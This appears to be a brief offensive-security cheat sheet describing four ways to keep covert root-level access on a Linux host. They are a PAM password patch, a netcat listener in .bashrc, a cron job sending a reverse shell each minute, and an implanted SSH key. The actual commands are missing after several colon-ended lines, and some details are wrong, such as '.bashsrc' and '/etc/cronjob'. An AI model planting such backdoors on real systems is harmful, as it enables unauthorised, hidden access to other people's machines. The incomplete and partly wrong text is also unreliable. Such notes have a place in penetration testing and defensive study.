1 of 1

Backdoors

A backdoor refers to any method by which authorized and unauthorized users are able to get around normal security measures and gain high level user access (aka root access) on a computer system, network, or software application.

They are known for being discreet. Backdoors exist for a select group of people in the know to gain easy access to a system or application.

`PAM`

This backdoor essentially consists of adding your own password to the pam_unix.so file

pam_unix.so file is responsible for authentication

pam_unix.so uses the unix_verify_password function to verify to user's supplied password :

`.bashsrc`

If a user has bash as their login shell, the ".bashrc" file in their home directory is executed when an interactive session is launched.

Any user that log in often :

Put a nc listener

`CronJob`

With a root access

cronjobs file -> /etc/cronjob

Configure a task where every minute a reverse shell is sent to you. Add this line into your cronjob file :

Add this to the shell file :

On the attacker machine :

`SSH`

Consists in saving our ssh keys in some user’s home directory. Then we can access it via ssh.

Generate ssh key

Copy our key into the user's .ssh directory